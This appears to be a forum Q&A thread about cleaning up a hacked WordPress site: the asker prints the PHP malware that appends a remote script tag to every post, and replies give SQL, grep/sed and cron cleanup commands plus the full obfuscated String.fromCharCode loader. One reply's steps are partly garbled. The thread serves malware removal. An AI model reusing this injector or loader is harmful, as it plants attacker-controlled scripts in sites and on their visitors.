How to bulk delete a part of every WordPress post

Date: 2020-08-12 Author: Matthew

The site was hacked, and every post had a line of JS code injected below its content!

<script src='https://js.xxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script>
I found the malware file in the root directory; it injects the JS code with the following code:

// Malware file as found on the server: walks every table whose name contains "post"
// and appends the loader <script> tag to post_content wherever it is not already present.
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
    while ($row = $result->fetch_assoc()) {
        $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " LIMIT 1 ";
        $result2 = $conn->query($q2);
        if ($result2->num_rows > 0) {
            while ($row2 = $result2->fetch_assoc()) {
                $val = $row2['post_content'];
                // Redundant double check in the original file: only inject if the domain is absent
                if (strpos($val, "js.donatelloflowfirstly.ga") === false) {
                    if (strpos($val, "js.donatelloflowfirstly.ga") === false) {
                        $q3 = "UPDATE " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%js.donatelloflowfirstly.ga%'";
                        $conn->query($q3);
                        echo "sql:" . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"];
                    } else {
                    }
                }
            }
        } else {
        }
    }
} else {
}
$conn->close();
Could someone please help me with a MySQL command so that I can delete this code from phpMyAdmin?

3 replies
SO user: Behemoth

Go to phpMyAdmin. Click on the database and run the following SQL query:

UPDATE wp_posts SET post_content=(REPLACE (post_content, 'https://js.xxxxxxx.ga/stat.js?n=ns1',''));
The above contains the js script src. We are just removing it.

This happens for many reasons. You have to find the exact source of the infection. It mostly happens with pirated/nulled themes. We will fix this successfully by following the steps below.

Setup: use VS Code or something similar that supports the "Search in files" option (not Notepad++)
  • Download a fresh copy of WordPress (the version you are using)

Solution:

  1. Download a full backup of the project from the server and put it in some folder (e.g. project dev) dir/ "password" or "or" "id/password" in an if statement followed by some hash, then delete that hash up to the proper comment line. (Most themes start with a comment.)
  2. Make sure all the files in the theme are required ones. You no longer have such code.

If you get stuck, contact me at [email protected]

    SO user: Matthew

    @Behemoth thanks for the reply! I just edited your command to use " because the js code contains ', and it works!

    UPDATE wp_posts SET post_content = REPLACE (post_content, "<script src='https://js.xxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script>", '');
    
    I use a paid theme and some paid plugins, but 2 nulled plugins, which is a shame! Now looking for some tools to check the code! Hoping to find the backdoor...

    SO user: user193835

    This is my list of commands for Linux CentOS:

    1. remove malware scripts

    find /var/www/ -type f -name "_a" -exec rm -f "{}" +;
    find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
    
    Put this command in cron to keep the server clean (it deletes the malicious files every 15 minutes if they are found on the server):

    # execute every 15 minutes
    */15 * * * *  find /var/www/ -type f -name "rms_unique_wp_mu_pl_fl_nm.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-ini.php" -exec rm -f "{}" +; find /var/www/ -type f -name "rms-script-mu-plugin.php" -exec rm -f "{}" +; find /var/www/ -type f -name "_a" -exec rm -f "{}" +; find /var/www/ -type f -name "_t" -exec rm -f "{}" +;
    

    2. clean cache from WP plugin

    3. clean db

    Use these SQL queries

    #check affected records
    SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
    SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
    SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
    SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
    SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";
        
    
    #clean db
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type='text/javascript'></script>", ''));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script type='text/javascript' src='https://js.donatelloflowfirstly.ga/stat.js?w=1'></script", ''));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://js.donatelloflowfirstly.ga/statistics.js?n=ns1' type='text/javascript'></script>", ''));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""https://js.donatelloflowfirstly.ga/statistics.js?n=ns1"" type=""text/javascript""></script>", ''));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", ''));
    UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src=""https://scripts.lowerbeforwarden.ml/src.js?n=ns1"" type=""text/javascript""></script>", ''));
    
    
    #recheck if all is clean
    SELECT * FROM wp_posts WHERE post_content LIKE "%donatello%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%blackwater%";
    SELECT * FROM wp_options WHERE option_value LIKE "%donatello%";
    SELECT * FROM wp_options WHERE option_value LIKE "%blackwater%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%directednotconverted%";
    SELECT * FROM wp_options WHERE option_value LIKE "%directednotconverted%";
    SELECT * FROM wp_posts WHERE post_content LIKE "%lowerbeforwarden%";
    SELECT * FROM wp_options WHERE option_value LIKE "%lowerbeforwarden%";
    

    4. check and clean malicious code inside the file

    Check for plain-text malicious code:

    cd /var/www
    grep -rlF "donatello"
    grep -rlF "blackwater"
    grep -rlF "lowerbeforwarden"
    
    Clean the code injected as plain text:

    grep -rlF "donatello" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/js.donatelloflowfirstly.ga\/statistics.js?n=nb5'><\/script>//g"
    grep -rlF "lowerbeforwarden" | xargs sed -i "s/<script type='text\/javascript' src='https:\/\/scripts.lowerbeforwarden.ml\/src.js?n=nb5'><\/script>//g"
    
    Check for obfuscated malicious code; if you convert the numeric string

    String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)
    
    in utf8 you will see:

    h,t,t,p,s,:,/,/,s,c,r,i,p,t,s,.,l,o,w,e,r,b,e,f,o,r,w,a,r,d,e,n,.,m,l,/,s,r,c,.,j,s
    
    Find the code:

    grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)"
    
    Remove the code:

    grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();<\/script>//g"
    grep -rlF "String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115)" | xargs sed -i "s/Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))\[0\]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))\[0\].appendChild(elem);})();//g"
    
    The last encoded string is for the "lowerbeforwarden" variant; use the correct sequence for "donatello".

    Hope this helps.
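As an added example (not part of this answer or the original thread), a small Python checker that decodes String.fromCharCode(...) sequences and flags the indicator terms used in the SELECT ... LIKE checks above, so the obfuscated loader is caught even when a grep for the literal domain finds nothing. The sample HTML is constructed for the demo; the only page-derived value in it is the charcode list quoted in this answer.

```python
import re

# Constructed sample (not taken from any real site): a post body carrying the obfuscated
# loader described above. The charcode list is the one quoted in the answer; the rest is a stub.
SAMPLE_HTML = (
    "<p>Hello world</p>"
    "<script type=text/javascript>(function() { var elem = document.createElement("
    "String.fromCharCode(115,99,114,105,112,116)); elem.src = String.fromCharCode("
    "104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,"
    "98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);"
    "})();</script>"
)

# Indicator terms from the answer's SELECT ... LIKE checks.
WATCH_TERMS = ("donatello", "blackwater", "directednotconverted", "lowerbeforwarden")

# Matches the argument list of a String.fromCharCode(n, n, ...) call.
CHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def decode_charcodes(text):
    """Decode every String.fromCharCode(...) call in `text` to the string it builds."""
    decoded = []
    for match in CHARCODE_RE.finditer(text):
        codes = [int(c) for c in match.group(1).split(",") if c.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def find_indicators(text, watch_terms=WATCH_TERMS):
    """Return the sorted watch terms found in `text`, either as plain text or inside a
    decoded String.fromCharCode(...) payload, so a literal grep is not the only check."""
    haystacks = [text] + decode_charcodes(text)
    return sorted({term for term in watch_terms for hay in haystacks if term in hay})


if __name__ == "__main__":
    # Run the checker over the constructed sample; feed it post_content rows or file
    # contents from the theme directory in real use.
    print("decoded strings:", decode_charcodes(SAMPLE_HTML))
    print("indicators found:", find_indicators(SAMPLE_HTML))
```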